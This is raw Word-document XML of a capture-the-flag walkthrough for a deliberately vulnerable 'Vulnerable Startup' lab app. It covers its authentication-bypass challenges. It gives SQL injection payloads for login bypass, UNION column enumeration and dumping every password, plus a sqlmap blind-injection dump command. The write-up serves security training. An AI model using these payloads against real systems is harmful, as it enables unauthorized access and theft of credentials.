        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://10.10.30.46:5000/challenge1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3925962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96236"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rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerable Startup: Broken Authentication 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="705600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0043"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ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The login form is still vulnerable to SQL injection, and it is possible to bypass the login by using ' OR 1=1-- - as a username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Before dumping all the passwords, we need to identify places where results from the login query is returned within the application. After logging in, the name of the currently logged-on user is displayed in the top right corner, so it might be possible to dump the data there.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Data from the query could also be stored in the session cookie. It is possible to extract the session cookie by opening developer tools in the browser, which can be done by pressing F12.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1140878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7806"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ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20594045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04587"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r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>When logging in to the application, it executed the query below. From the SQL statement, we can see that it is retrieving two columns; id and username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT id, username FROM users WHERE username = '" + username + "' AND password = '" + password + "'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Without knowing the number of columns upfront, the attacker must first enumerate the number of columns by systematically injecting queries with different numbers of columns until it is successful. For example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1' UNION SELECT NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1' UNION SELECT NULL, NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1' UNION SELECT NULL, NULL, NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>By using ' UNION SELECT 1,2-- - as username, we match the number of columns in the original SQL query, and the application lets us in. After logging in, we can see that the username is replaced with the integer 2, which is what we used as column two in the injected query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>By injecting the following code into the username field:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' UNION SELECT 1,group_concat(password) FROM users-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>All the passwords are dumped:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14650989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98967"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4293535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3503"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pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerable Startup: Broken Authentication 3 (Blind Injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13518598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59831"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rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>An example script is provided inside the machine and can be view and downloaded by going to </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://machine_ip:5000/view/challenge3/challenge3-exploit.py" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="007BFF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://MACHINE_IP:5000/view/challenge3/challenge3-exploit.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="007BFF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>; note that it will be necessary to change the password length with the password_len variable. The length of the password can be found by asking the database. For example, in the query below, we ask the database if the length of the password equals 37:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2672715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15133534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53459"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943600" cy="2672715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>An alternative way to solve this challenge is by using a tool such as sqlmap, which is an open source tool that automates the process of detecting and exploiting SQL injection flaws. The following command can be used to exploit the vulnerability with sqlmap:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sqlmap -u http://MACHINE_IP:5000/challenge3/login --data="username=admin&amp;password=admin" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--level=5 --risk=3 --dbms=sqlite --technique=b --dump</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>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Ubuntu">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>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0"/>
        <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:between w:val="none" w:color="auto" w:sz="0" w:space="0"/>
      </w:pBdr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="7"/>
      <w:tblW w:w="9900" w:type="dxa"/>
      <w:tblInd w:w="0" w:type="dxa"/>
